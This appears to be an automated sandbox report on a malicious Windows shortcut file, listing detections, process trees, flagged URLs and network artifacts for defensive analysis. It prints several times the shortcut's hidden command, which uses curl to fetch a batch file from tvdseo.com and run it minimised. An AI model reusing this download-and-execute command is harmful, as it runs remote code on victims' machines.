
Windows Analysis Report
document.lnk.download.lnk

Overview

General Information

Sample name: document.lnk.download.lnk
Analysis ID: 1562561
MD5: 504d8898a97dda2963425df8c5a04118
SHA1: 0554cf0e2137e4a925e9137b9330491361c77011
SHA256: 7a1d5aa394c347ff8606fa04a44cc507fab103c8167e52310ec683dbb005b4fd
Tags: Compilazione, protetti, copyright, lnk, user-JAMESWT_MHT
Infos:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Curl Download And Execute Combination
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

  • System is w10x64
  • cmd.exe (PID: 3036 cmdline: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 5916 cmdline: curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • cmd.exe (PID: 3076 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Sreeman, Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, ProcessId: 3036, ProcessName: cmd.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat, ProcessId: 3036, ProcessName: cmd.exe
No Suricata rule has matched


AV Detection

Source: https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.batS | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-app-store-ios/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/about/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/comments/feed/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-app-chplay/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8l | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2) | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2) | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/phan-mem/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4) | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.png | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2) | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/url-short-short-link/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.batD | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8l | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/app/ShemaTuyenDung.php | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-tiktok/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-lazada/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons) | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2) | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/cart-2/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/remove-background-xoa-nen-anh-free/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.png | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#organization | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-youtube/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver= | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/tin-hoc-ab/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.bate | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9. | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-tmdt/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4) | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.png | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.png | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/xmlrpc.php | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?ve | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4) | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4) | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.js | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4e | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/xmlrpc.php?rsd | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/iq-vo-cuc/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/file/quan.bat | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-sear | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.png | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min. | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4); | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-instagram/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#website | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.png | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-facebook/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/category/thongtinhay/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-fanpage/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/my-account-2/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-google-map/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1 | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/dich-vu-seo-shop-shoppe/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttf | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc. | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/#/schema/logo/image/ | Avira URL Cloud: Label: phishing
Source: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0 | Avira URL Cloud: Label: phishing
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 93.2% probability
Source: document.lnk.download.lnk | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 104.21.81.137:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: Joe Sandbox View | JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /file/quan.bat HTTP/1.1 | Host: tvdseo.com | User-Agent: curl/7.83.1 | Accept: */*
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: SEO TVD"},"image":{"@id":"https://tvdseo.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/102126481779000"]}]}</script> equals www.facebook.com (Facebook)
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: <li class="bullet-arrow"><a href="https://www.youtube.com/channel/UCUZToD8MAs4MWywND_9DStg"><span style="font-size: 15px;">Youtube D equals www.youtube.com (Youtube)
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: <li class="bullet-arrow"><a href="https://www.youtube.com/channel/UCjt7SG-LPi6OafmLxoc1ULg"><span style="font-size: 15px;">Youtube Tr equals www.youtube.com (Youtube)
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: <p><iframe src="https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Ftvdseo&tabs=timeline&width=500&height=500&small_header=false&adapt_container_width=false&hide_cover=false&show_facepile=true&appId=270453733610848" width="500" height="500" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowfullscreen="true" allow="autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share"></iframe></p> equals www.facebook.com (Facebook)
Source: global traffic | DNS traffic detected: DNS query: tvdseo.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 17:01:26 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | x-powered-by: PHP/8.2.15 | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | link: <https://tvdseo.com/wp-json/>; rel="https://api.w.org/" | vary: Accept-Encoding | platform: hostinger | panel: hpanel | content-security-policy: upgrade-insecure-requests | x-turbo-charged-by: LiteSpeed | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvEicoSiJDmB7Y12x6ziuTJeaIUpVBDygvw6DEwaKrs7dK7%2B7cZzJIvvg7Fp1CiMmSsBnAC0n%2Bf1Vxjc3rEWpZ9cWbvlmqOvuCln4fcZY197F64mB5CRw8OHYw%2Bz"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e83335fdaa0422b-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=725&delivery_rate=1332116&cwnd=234&unsent_bytes=0&cid=f60b1835723be41a&ts=887&x=0"
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: http://www.dmca.com/Protection/Status.aspx?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://api.w.org/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://congdonginan.vn/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://gmpg.org/xfn/11
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://gravatar.com/dungk396
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://images.dmca.com/Badges/DMCABadgeHelper.min.js
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://images.dmca.com/Badges/dmca_protected_sml_120l.png?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://images.dmca.com/badges/dmca.css?ID=502286c4-db26-4ff5-898e-3899d9fd8507
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://marketing.tvdseo.com/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://news.google.com/publications/CAAqBwgKMP6toQswlri5Aw?hl=vi&amp;gl=VN&amp;ceid=VN%3Avi
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://schema.org
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/#/schema/logo/image/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/#organization
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/#website
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/?s=
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/about/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/app/ShemaTuyenDung.php
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/cart-2/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/category/dich-vu/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/category/hocseo/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/category/phan-mem/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/category/thongtinhay/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/category/tin-hoc-ab/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/category/wiki/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/comments/feed/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-app-chplay/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-app-store-ios/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-facebook/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-fanpage/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-google-map/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-instagram/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-lazada/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-shoppe/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-tiki/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-shop-tmdt/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-tiktok/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-website/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/dich-vu-seo-youtube/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/feed/
Source: curl.exe, 00000002.00000002.1293018592.00000000034E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.1293075206.0000000003628000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292708702.0000000003655000.00000004.00000020.00020000.00000000.sdmp, document.lnk.download.lnk | String found in binary or memory: https://tvdseo.com/file/quan.bat
Source: curl.exe, 00000002.00000002.1293163205.0000000003655000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292708702.0000000003655000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tvdseo.com/file/quan.batD
Source: curl.exe, 00000002.00000002.1293075206.0000000003620000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tvdseo.com/file/quan.batS
Source: curl.exe, 00000002.00000002.1293075206.0000000003628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tvdseo.com/file/quan.bate
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/iq-vo-cuc/
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/my-account-2/
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/my-account-2/lost-password/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/remove-background-xoa-nen-anh-free/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/url-short-short-link/
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8l
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8l
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Sup8.
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2)
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2)
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2)
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?ve
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver=
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411
Source: curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9.4.1
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9.
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min.
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4)
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4);
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons)
Source: UDkXtQleTB.bat.2.dr | String found in binary or memory: https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4)
